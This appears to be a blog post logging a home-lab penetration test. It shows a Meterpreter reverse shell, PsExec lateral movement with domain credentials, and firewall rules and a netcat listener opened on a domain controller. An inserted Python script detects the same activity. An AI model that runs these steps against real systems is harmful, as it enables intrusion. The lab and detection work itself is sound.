(NOTE: I apologize for the screwed up indentation and formatting in the latter part of this post but the editor for this blog sucks and I don't have time to do all the html by hand)
In my last post I noted that I would continue with the attempted compromise for a couple more days. I'm happy to report that I was able to succeed in getting a hole through the gateway firewall and a netcat listener on an internal workstation, thanks to Mark Russinovich and Psexec. The following is an annotated scrollback buffer from the attack machine wks-Matriux:
/* My scrollback didn't capture everything... this is the tail end of output from ps shortly after a meterpreter session was created */
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
meterpreter > shell
Process 1644 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program files\ps>c:\bin\whoami
c:\bin\whoami
TEST\usr1
/* This is the start of my attempts to work with psexec; it took a bit of fiddling to get it right. It is important to use the /accepteula argument on first run, or a window pops up that you can't see or respond to. After that, I don't think it's necessary. */
C:\Program files\ps>psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
/* I'll leave this first banner in, because Mark deserves credit. I will eliminate the rest though (should have a -q switch?) */
PsExec v1.59 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com
Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:
C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:
C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
Logon failure: unknown user name or bad password.
PsExec could not start netsh on WKS-XP1:
/* I finally figured out that you had to supply the user name in DOMAIN\user format. I cheated a little: since psexec doesn't "pass the hash", I used the real password. I think this is acceptable though, since the attacker already has the password hashes and would probably be able to crack the password. If nothing else, I could have created my own user and supplied the password, added it to the domain admin group, etc. */
C:\Program files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 whoami
psexec \\srv-DC -u TEST\usr1 -p usr1 whoami
whoami exited on srv-DC with error code 0.
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
NAT must be installed first.
netsh exited on WKS-XP1 with error code 0.
/* I am not quite sure why it was telling me this. Maybe because you have to be elevated to run the command, but as you'll see later, it warns me that I am not elevated. */
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp
The following command was not found: advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp.
netsh exited on WKS-XP1 with error code 1.
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
The following command was not found: "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp".
netsh exited on WKS-XP1 with error code 1.
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp on WKS-XP1:
C:\Program files\ps>copy c:\bin\nc.exe .
copy c:\bin\nc.exe .
1 file(s) copied.
C:\Program files\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322
Directory of C:\Program files\ps
04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,678,976 bytes free
/* Here I copied netcat into the current directory, just to make it easier to work with. I then ran an nmap scan on srv-dc to see what ports were available. */
C:\Program files\ps>cd ..
cd ..
C:\Program Files>cd nmap
cd nmap
C:\Program Files\nmap>nmap -sS -F -n -v 192.168.2.1
nmap -sS -F -n -v 192.168.2.1
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-13 23:08 Central Standard Time
Initiating ARP Ping Scan at 23:08
Scanning 192.168.2.1 [1 port]
Completed ARP Ping Scan at 23:08, 0.85s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:08
Scanning 192.168.2.1 [100 ports]
Discovered open port 53/tcp on 192.168.2.1
Discovered open port 135/tcp on 192.168.2.1
Discovered open port 445/tcp on 192.168.2.1
Discovered open port 49157/tcp on 192.168.2.1
Discovered open port 49155/tcp on 192.168.2.1
Discovered open port 389/tcp on 192.168.2.1
Discovered open port 49154/tcp on 192.168.2.1
Discovered open port 88/tcp on 192.168.2.1
Discovered open port 5357/tcp on 192.168.2.1
Completed SYN Stealth Scan at 23:08, 2.68s elapsed (100 total ports)
Nmap scan report for 192.168.2.1
Host is up (0.027s latency).
Not shown: 91 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
5357/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
MAC Address: 08:00:27:33:48:CD (Cadmus Computer Systems)
Read data files from: C:\Program Files\nmap
Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds
Raw packets sent: 193 (8490B) | Rcvd: 11 (482B)
C:\Program Files\nmap>cd ..\ps
cd ..\ps
/* In the following few lines, I was trying to copy nc.exe over to srv-dc and execute it. I guess I don't grasp the concept of how psexec uses the -c argument. */
C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357
Can't grab 192.168.2.1:5357 with bind
nc.exe exited on WKS-XP1 with error code 1.
C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157
Can't grab 192.168.2.1:49157 with bind
nc.exe exited on WKS-XP1 with error code 1.
C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:
/* Here I decided to just try and do a direct copy. When that failed I tried to map the Admin$ share. That also failed, I think because I was using an impersonation token rather than actually running in a process owned by usr1. */
C:\Program Files\ps>copy nc.exe \\svr-DC\admin$
copy nc.exe \\svr-DC\admin$
The network path was not found.
0 file(s) copied.
C:\Program Files\ps>net use z: \\svr-DC\admin$
net use z: \\svr-DC\admin$
The server is not configured for remote administration.
More help is available by typing NET HELPMSG 3743.
C:\Program Files\ps>exit
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe
1216 svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
meterpreter > migrate 348
[*] Migrating to 348...
[*] Migration completed successfully.
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>net use * \\192.168.2.1\admin$
net use * \\192.168.2.1\admin$
Drive Z: is now connected to \\192.168.2.1\admin$.
The command completed successfully.
/* It worked after migrating into a process owned by usr1 */
C:\Documents and Settings\usr1.TEST>cd c:\progra~1\ps
cd c:\progra~1\ps
C:\PROGRA~1\ps>copy nc.exe z:\
copy nc.exe z:\
1 file(s) copied.
C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:
/* huh? */
C:\PROGRA~1\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322
Directory of C:\PROGRA~1\ps
04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,658,496 bytes free
C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:
C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h
The system cannot find the file specified.
PsExec could not start c:\windows\nc.exe on WKS-XP1:
C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
Can't grab 192.168.2.1:49157 with bind
nc.exe exited on srv-DC with error code 1.
/* Was the AcceptEULA screwing things up? Now it runs on srv-dc. */
C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999
psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999
^C
Terminate channel 1? [y/N] n
[-] Error running command shell: SignalException SIGUSR1
/* In the preceding, netcat started running, but I had no way to interact with it. Ctrl-C tends to end up killing the whole session rather than just the command shell channel. I discovered a way to avoid this on Matriux (Ubuntu): press Alt+F2 and it pops up krunner (I think that's what it's called); click the icon just left of the text box and you get a thing much like Process Explorer. Find metasploit under Konsole (running as ruby), right click it and send it the SIGUSR1 signal, and it usually puts you back into the meterpreter session. */
meterpreter > rev2self
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe
meterpreter > shell
Process 1564 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>c:\bin\whoami
c:\bin\whoami
TEST\usr1
C:\Documents and Settings\usr1.TEST>exit
meterpreter > rev2self
meterpreter > getuid
Server username: TEST\usr1
meterpreter > shell
Process 1540 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>nc -vv -n 192.168.2.1 9999
nc -vv -n 192.168.2.1 9999
hello
(UNKNOWN) [192.168.2.1] 9999 (?): TIMEDOUT
sent 0, rcvd 0: NOTSOCK
C:\Program Files\ps>hello
'hello' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files\ps>exit
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe
meterpreter > kill 1776
Killing: 1776
meterpreter > kill 344
Killing: 344
meterpreter > shell
Process 180 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>psexec \\server-dc -u TEST\usr1 -p usr1 tasklist
psexec \\server-dc -u TEST\usr1 -p usr1 tasklist
The network path was not found.
Couldn't access server-dc:
Make sure that the default admin$ share is enabled on server-dc.
C:\Program Files\ps>net use * /delete
net use * /delete
You have these remote connections:
Z: \\192.168.2.1\admin$
\\192.168.2.50\IPC$
\\srv-DC\IPC$
Continuing will cancel the connections.
Do you want to continue this operation? (Y/N) [N]:
No valid response was provided.
C:\Program Files\ps>net use Z: /delete
net use Z: /delete
Z: was deleted successfully.
C:\Program Files\ps>psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist
psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist
The network path was not found.
Couldn't access svr-dc:
Make sure that the default admin$ share is enabled on svr-dc.
C:\Program Files\ps>ping -n 2 192.168.2.1
ping -n 2 192.168.2.1
Pinging 192.168.2.1 with 32 bytes of data:
Reply from 192.168.2.1: bytes=32 time=2ms TTL=128
Reply from 192.168.2.1: bytes=32 time=5ms TTL=128
Ping statistics for 192.168.2.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 5ms, Average = 3ms
C:\Program Files\ps>exit
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
/* Things had gotten all screwed up by this point, with zombie processes running on srv-dc and wks-xp1, so I killed the session, killed the zombies manually, and restarted the exploit. */
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
^C[-] Exploit failed:
[*] Exploit completed, but no session was created.
msf exploit(handler) > jobs
Jobs
====
No active jobs.
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 2 opened (192.168.1.188:31337 -> 192.168.1.250:62571)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 2
[-] The 'stdapi' extension has already been loaded.
meterpreter > shell
Process 1028 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp on srv-DC:
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" di
psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh
netsh exited on srv-DC with error code 0.
/* The preceding appears weird because I had copied the command into the console, realized it was wrong, and tried to correct it. The console wouldn't let me backspace past the beginning of the line so I ended up running a "half command" via psexec. I do see that it works though. I finally got the quoting right. I think the dash in the name argument was screwing things up and needed to be quoted. */
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
The requested operation requires elevation.
netsh exited on srv-DC with error code 1.
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
Ok.
netsh exited on srv-DC with error code 0.
/* Woo hoo! Added the -s argument to run as system and it worked. I now have a firewall rule in place. */
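As an added example from the defender's side (not code from the original post), the following Python triages constructed Windows event records for the host-side traces the admin$ staging and the `psexec -s` firewall change above would leave on srv-dc. The event ids are Windows' own; the simplified field layout and the sample records are constructed for this illustration.

```python
"""Triage constructed Windows event records for the traces PsExec-style remote
administration leaves behind: a PSEXESVC service install (System 7045), access
to the ADMIN$ share (Security 5140) and a firewall rule addition (Security 4946).
Security 5140 and 4946 only appear when the File Share and MPSSVC Rule-Level
Policy Change audit subcategories are enabled."""
import re
from collections import defaultdict

# Constructed sample in a simplified field layout (not a real log export);
# the host, user and rule names mirror the lab described in the post.
SAMPLE_EVENTS = [
    {"log": "System", "id": 7045, "host": "SRV-DC",
     "fields": {"ServiceName": "PSEXESVC",
                "ImagePath": "%SystemRoot%\\PSEXESVC.exe",
                "AccountName": "LocalSystem"}},
    {"log": "Security", "id": 5140, "host": "SRV-DC",
     "fields": {"SubjectUserName": "usr1", "SubjectDomainName": "TEST",
                "IpAddress": "192.168.2.50", "ShareName": "\\\\*\\ADMIN$"}},
    {"log": "Security", "id": 4946, "host": "SRV-DC",
     "fields": {"ProfileChanged": "All", "RuleName": "jah-netcat"}},
    # Benign noise: a normal service install and a non-administrative share.
    {"log": "System", "id": 7045, "host": "SRV-DC",
     "fields": {"ServiceName": "Spooler",
                "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe",
                "AccountName": "LocalSystem"}},
    {"log": "Security", "id": 5140, "host": "SRV-DC",
     "fields": {"SubjectUserName": "usr1", "SubjectDomainName": "TEST",
                "IpAddress": "192.168.2.50", "ShareName": "\\\\*\\SYSVOL"}},
]

# \\*\ADMIN$, \\*\C$, \\*\IPC$ as Windows writes them in the ShareName field.
ADMIN_SHARES = re.compile(r"\\\\\*\\(ADMIN\$|[A-Z]\$|IPC\$)$", re.IGNORECASE)
# Directories a freshly installed service binary should not normally live in.
STAGING_DIRS = re.compile(r"\\(TEMP|ProgramData|Users\\[^\\]+)\\", re.IGNORECASE)


def classify(event):
    """Return (severity, description) for an interesting event, else None."""
    f = event["fields"]
    if event["log"] == "System" and event["id"] == 7045:
        name, path = f.get("ServiceName", ""), f.get("ImagePath", "")
        if name.upper() == "PSEXESVC" or "PSEXESVC" in path.upper():
            return ("high", f"PsExec service installed ({path})")
        if STAGING_DIRS.search(path):
            return ("medium", f"service {name} installed from staging path {path}")
        return None
    if event["log"] == "Security" and event["id"] == 5140:
        share = f.get("ShareName", "")
        if ADMIN_SHARES.search(share):
            who = f"{f.get('SubjectDomainName')}\\{f.get('SubjectUserName')}"
            return ("medium", f"{share} accessed by {who} from {f.get('IpAddress')}")
        return None
    if event["log"] == "Security" and event["id"] == 4946:
        return ("medium", f"firewall rule added: {f.get('RuleName')} "
                          f"(profile {f.get('ProfileChanged')})")
    return None


def triage(events):
    """Classify every event and correlate per host: a remote service install
    followed by a firewall-rule change on the same host is reported as a chain."""
    alerts, seen = [], defaultdict(set)
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        severity, description = hit
        alerts.append({"host": ev["host"], "id": ev["id"],
                       "severity": severity, "description": description})
        seen[ev["host"]].add(ev["id"])
    chains = {host: "remote service install (7045) and firewall rule change (4946)"
              for host, ids in seen.items() if {7045, 4946} <= ids}
    return {"alerts": alerts, "chains": chains}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for a in result["alerts"]:
        print(f"[{a['severity']}] {a['host']} {a['id']}: {a['description']}")
    for host, chain in result["chains"].items():
        print(f"[chain] {host}: {chain}")
```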
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
192.168.1.188 is not an acceptable value for proto.
netsh exited on srv-DC with error code 1.
/* Oops, missed a necessary argument. Added it and tried again but things got screwed for unknown reasons and I had to exit and rerun the exploit to start a new session. */
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999
Terminate channel 1? [y/N]
n
Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
